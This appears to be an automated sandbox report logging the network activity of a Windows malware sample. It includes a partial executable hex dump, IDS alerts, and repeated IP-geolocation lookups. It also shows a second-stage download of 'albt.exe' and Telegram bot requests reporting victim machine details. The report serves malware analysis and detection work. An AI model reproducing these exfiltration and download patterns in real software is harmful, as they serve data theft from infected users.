HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 16 Jan 2025 00:23:14 GMTAccept-Ranges: bytesETag: "86a3fcd4ac67db1:0"Server: Microsoft-IIS/8.5Date: Thu, 16 Jan 2025 13:05:50 GMTContent-Length: 854016Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 68 05 00 00 9c 07 00 00 00 00 00 54 77 05 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 0d 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 74 24 00 00 00 90 06 00 f0 f5 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 90 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 e6 05 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 5f 05 00 00 10 00 00 00 60 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 9c 07 00 00 00 70 05 00 00 08 00 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ec 1c 00 00 00 80 05 00 00 1e 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 80 36 00 00 00 a0 05 00 00 00 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 74 24 00 00 00 e0 05 00 00 26 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 10 06 00 00 00 00 00 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 5e 00 00 00 30 06 00 00 60 00 00 00 b2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 f0 f5 06 00 00 90 06 00 00 f6 06 00 00 12 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0d 00 00 00 00 00 00 0c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2015:19:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2015:18:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2016:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 166.62.27.188 166.62.27.188

Source: Joe Sandbox View

ASN Name: NASHIRNET-ASNNASHIRNETASNSA NASHIRNET-ASNNASHIRNETASNSA

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 166.62.27.188:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49785 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49796 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49758 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49883 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49863 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49941 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49915 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49858 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49889 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49878 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49779 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49921 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49842 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49908 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49827 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49935 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49901 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49814 -> 104.21.80.1:443

Source: global traffic

TCP traffic: 192.168.2.5:49934 -> 46.151.208.21:587

Source: global traffic	HTTP traffic detected: GET /admin/245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /albt.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49772 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49872 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49928 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113

Source: global traffic	HTTP traffic detected: GET /admin/245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2015:19:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2015:18:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2016:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /albt.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
